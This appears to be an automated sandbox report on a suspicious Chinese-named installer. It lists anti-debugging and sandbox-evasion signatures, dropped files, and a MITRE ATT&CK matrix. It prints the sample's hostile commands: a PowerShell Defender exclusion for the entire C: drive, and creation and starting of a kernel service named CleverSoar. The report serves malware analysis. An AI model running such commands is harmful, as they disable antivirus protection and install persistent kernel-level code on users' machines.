Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6279Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3345Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpWindow / User API: threadDelayed 614Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpWindow / User API: threadDelayed 589Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpWindow / User API: threadDelayed 563Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-9PU3N.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-361I0.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2LMM8.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-361I0.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2LMM8.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeAPI coverage: 7.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548Thread sleep time: -10145709240540247s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C7AAEC0 FindFirstFileA,FindClose,5_2_6C7AAEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00C76868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,9_2_00C76868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00C77496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,9_2_00C77496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00C79C60 GetSystemInfo,9_2_00C79C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000002.1710277164.000000000137C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C633886 NtSetInformationThread 00000000,00000011,00000000,000000005_2_6C633886
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C7C0181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_6C7C0181
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CF57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,9_2_00CF57D0
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C7C9D66 mov eax, dword ptr fs:[00000030h]5_2_6C7C9D66
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C7C9D35 mov eax, dword ptr fs:[00000030h]5_2_6C7C9D35
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C7BF17D mov eax, dword ptr fs:[00000030h]5_2_6C7BF17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C7B8CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_6C7B8CBD
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C7C0181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_6C7C0181

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: tProtect.dll.11.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C887700 cpuid 5_2_6C887700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00C7AB2A GetSystemTimeAsFileTime,9_2_00C7AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00D10090 GetVersion,9_2_00D10090
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation
1
Windows Service
1
Access Token Manipulation
11
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
1
Windows Service
1
Disable or Modify Tools
LSASS Memory431
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Service Execution
Logon Script (Windows)111
Process Injection
231
Virtualization/Sandbox Evasion
Security Account Manager231
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Native API
Login Hook1
DLL Side-Loading
1
Access Token Manipulation
NTDS2
Process Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information
Cached Domain Credentials2
System Owner/User Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
Obfuscated Files or Information
DCSync3
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Software Packing
Proc Filesystem25
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
